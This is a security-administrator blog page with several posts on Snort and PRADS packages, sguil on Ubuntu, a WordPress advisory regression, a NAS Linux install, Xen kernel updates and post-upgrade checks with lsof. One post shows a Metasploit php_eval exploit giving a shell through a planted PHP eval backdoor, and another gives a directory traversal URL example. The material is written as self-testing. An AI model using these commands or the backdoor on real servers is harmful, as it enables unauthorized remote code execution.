OSS and Security @ WORK
Back from vacation 
I did pack 2.8.6.0, but it never made it to the public before I went on vacations :/
You can find 2.8.6.1 here:
http://debs.gamelinux.org/snort/hardy/
-*> Snort! <*-
Version 2.8.6.1 IPv6 GRE (Build 39)
As Kacper stated here, PRADS 0.2.0 has been released!
You can download some debian packages here, or you can check out the GIT repo here.
Bug reports, issues, thoughts or any comments are very welcome!
Enjoy!
As Ubuntu 10.04 (Lucid Lynx) is the next LTS (Long Time Support) version of Ubuntu that is coming out soon (April 29, 2010), I have started to look at how sguil and my dot deb packages will work.
I installed Lucid Lynx yesterday and installed my server and sensor debs on it.
Some first notes:
* MySQL is not eating the create_sguildb.sql (Just remove the comments)
* Lucid (and Karmic) does not ship with tclx8.3(Installing the Hardy version worked just fine)
(I filled a bug report to Ubuntu, hoping to get tclx8.3 into the final release…)
So, from my first tests, it seems to work fine!
I have yet to test the sguil-client on Lucid, and also I did not get to test with extensive amount of traffic and operations on the Lucid test server.
So, looking promising
Loglevel: INFO
I have packed snort 2.8.5.3 for Ubuntu Hardy and Jaunty:
http://debs.gamelinux.org/snort/hardy/
http://debs.gamelinux.org/snort/jaunty/
-*> Snort! <*-
Version 2.8.5.3 IPv6 (Build 124)
After installing “[SECURITY] [DSA 1871-1] New wordpress packages fix several vulnerabilities” from 23. of August 2009, I quickly saw that there was something wrong in the logs:
PHP Fatal error: Call to undefined function absint() in /usr/share/wordpress/wp-includes/functions.php on line 2008.
I looked over the DSA, and identified the fix for CVE-2008-4769 that broke this. Then I emailed Steffen Joeris, who released the DSA and notified him about my findings. Two hours later, Giuseppe Iuculano sent me an update which I installed and confirmed worked, and which I could not find any regressions to it.
I looked at the CVE-2008-4769 and at the Secunia advisory, which claims that the vulnerability is only working on Windows platform. This probably explains why Debian has waited so long for including the fix. The original CVE is from 2008-04-25, so this is old news btw…
From advisories:
“It was discovered that the get_category_template function is prone to a directory traversal vulnerability, which could lead to the execution of arbitrary code. This can be exploited to include arbitrary PHP files from local resources via directory traversal attacks. Successful exploitation allows execution of arbitrary PHP code, but requires privileges to store PHP files on an affected system and that WordPress is installed on a Windows platform.”
I have only registered generic attacks in the wild against the ‘cat’ parameter in my gamelinux.org and other web logs (dating back to Dec 2006). No requests seems to aim at exploiting this vulnerability specifically.
An example of an URL that was supposed to work (Not confirmed):
http://www.gamelinux.org/?cat=1.php/../searchform?
The DSA regression was released 4 days after the original DSA BTW.
For 898,- NOK (right around £100) down at Clas Ohlson here in Norway, you get a nice little NAS server (AID 38-2447). Straight out of the box, its a low-end NAS, but I bought this, in spirit of installing a full blown Linux distro on to it. And so I did.
It took me about 30 minutes from I started to read the howtos, downloading and preparing the image to the hard drive and flashing the initrd of the Dual NAS, until it was up and running.
My notes:
* When you connect to the telnet boot menu, ping the NAS in one console, and when it starts answering, you have about one second to connect to it via telnet in another console.
* It needs a DHCP server to obtain an IP address after Debian is booted…
* The Debian Etch image from Felix Mellmann is rather old…(21. Nov. 2007) so you need to upgrade it (contains weak ssh keys etc.)
* It seems that it will not work with Debian Lenny (Complaining about old kernel)
If anyone has any insight into how to compile and install a newer working kernel for this hardware, I would be interested
Also the link to the original source of the kernel which comes default with this NAS would be great (I saw it yesterday, but I cant seem to find it again).
Mean while, I fully recommend this buy for a small cheap home server.
I see sloppy Administrators do this again and again…
They might update the Linux-Xen enabled Kernel on Dom0, but often DomU keeps the same for different reasons.
Running a (para) virtual environment, the freedom of running different Linux distributions, is often a goal. If one keeps a single architect environment stack, like Ubuntu Hardy Dom0 and DomU’s or CentOS 5.x Dom0 and DomU, keeping kernels in DomU up to date is low hassle.
The hassle starts to arise when you deploy mixed environments, like running Ubuntu Hardy as Dom0 and CentOS 5.x as DomU, or vice versa. You could setup CentOS or Ubuntu to use each others Kernel packages, though that seemed a bit overkill for my setup. Having a Debian Etch DomU on a Ubuntu Hardy Dom0 is fixable with pointing Etch to grab the Kernel from Hardy via an apt-repo.
PyGrub solves some hassles, so I recommend reading up on that and verifying that CVE-2007-4993 is not affecting you.
But for the cases where I have a bit hassle, and I dont want to use PyGrub, I wrote a small bash script to update the Linux Kernels.
Get the script here, and update/change/modify or learn from it, before you use it.
It Powers down the DomU if it is booted, and mounts the Logical Volume of the DomU, before it copies the kernel modules to the DomU filesystem. Runs depmod and unmounts the filesystem. Then it gives you the small change you need to update your xen-domU.cfg with (I dont use pygrub).
BTW: This paper has a nice walk through from Xen DomU to Xen Dom0 bypassing SELinux http://invisiblethingslab.com/pub/xenfb-adventures-10.pdf. Recommended read
Now go and update some Kernels!
Yesterday, Computerworld.no wrote an article on the Police/Conficker/Free software debate going on here in Norway.
Information director Eirik Lae Solberg at Microsoft Norway had a chance to comment:
“- If one had used a similar Linux distribution from the same time, one would have significant security issues.”
That is only true, if one did not upgrade! And in the GNU/Linux/Free Software world, one would not have any unmanageable issues upgrading.
I have personally managed lots of servers for large customers and universities, and when a new distribution release has been out,
take Debian as a very good example, you can change the source of packages from the current repository, to the new release repository.
And with some rather simple command line-fu, you can upgrade to the latest major Debian version.
Ubuntu has made this easy for the desktop users. Using a graphical front-end on your server (I dont), you can click your way to
a distribution upgrade.
I still recommend having people in the loop that has done such an upgrade, before you try this on your own. Always keep a
working backup, and you could even try the upgrade in a virtual machine, before you actually do it in production.
Eirik Lae Solberg even goes so far to claim that Zone-H.org shows that Linux is more `hacked` than Windows… Using Zone-H.org as a reliable source for such “scientific” statement, is just what Microsoft is known of doing. Well, just to let you all know, if you bother to check Zone-H.org by your self, this is what you might find today:
$ GET http://zone-h.org/archive/special=1/page=1|grep “<td>Linux”|wc -l
5
$ GET http://zone-h.org/archive/special=1/page=1|grep “<td>Win”|wc -l
7
As you see: Todays score is 5 boxes are Linux, and 7 are Windows.
I wrote a quick bash script (get it here)to check the first 30 pages and print out the total sum:
$ bash bin/Eirik_Lae_Solberg.sh
Total Linux: 289
Total Microsoft: 390
To summarize: On the last 30 pages from Zone-H, 289 websites running Linux OS got defaced, while 390 websites running on Windows OS got defaced.
(If you run the script yourself, the numbers will probably change - this was numbers from today)
So giving you the hard facts, and not marketing propaganda like Eirik Lae Solberg from Microsoft wants you to believe, make up your own mind, and don’t believe what ever you hear from Mister Microsoft…
BTW: Zone-H is not a good reference for measuring security in Operating Systems, if you didn’t know that… But it is a good way to point out that Eirik Lae Solberg don’t know much about Operating System security, and that he would rather focus on telling that Microsoft is way better than every body else…
For how long will you eat that lie?
A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. Setting up a new LAMP server etc, making sure its only can connect out to the places it should need to have access too, is a good security practice. Then open port 80 for connection from the world, minus .ru and .cn etc
So I thought…
Then egypt, from metasploit, made and presented me to the “php/shell_findsock payload”, which I think is awesome!
If you can get the LAMP server to some way execute the $shell_findsock payload, you can in many cases get a shell over the established http connection! You can also use the payload with other php exploits in the framework.
egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. But on my Ubuntu intrepid, I got :
sh: Syntax error: Bad fd number
and
Invalid method in request exit
egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET[’evalme’]); ?>, which would be the default for this metasploit setup.
Short version:
msf < use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST www.gamelinux.org
msf exploit(php_eval) > exploit
Screenshot:
And you thought that you where safe!
On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.
BTW: Upgrading might not be enough…
After upgrading (up2date, yum, apt, …) my Linux systems, I check with lsof to see if any processes needs a restart…
Why?
Because, running processes might still be using old libraries and binaries etc, and would need a restart to use the new ones…
So… You might be vulnerable, even if you do install security updates regularly…
On older versions of lsof, I used to issue: lsof +L1|grep DEL
This does not seem to be sufficient on newer versions of lsof… Might be a bug?
After searching the web for information for an easier or better way of doing this, I found little… I even did not find any good info on the way I am used of doing it… If you have a smarter way of checking this, I would love to hear from you…
Here are some references to what I found:
* A bugzilla thread on redhat.com. It also has a script for redhat based systems.
* Debian/Ubuntu based systems comes with debian-goodies… apt-get install debian-goodies and then you can use checkrestart. Which checks for programs that needs restart
To manually check, here are some commands you can issue, depending on your version of lsof.
# lsof -n +L | grep -w DEL | egrep -v ” (/dev|/SYSV|/tmp)”
# lsof -n | grep “path inode=”
# lsof -n +L1 | egrep -w “txt|mem” | grep -v ” /SYSV”
# lsof -n +L | grep -w DEL | egrep -v ” (/dev|/SYSV|/tmp) ”
Hope you make this check a habit after updating your servers…
This work is licensed under a Creative Commons License.
·
XHTML
·
CSS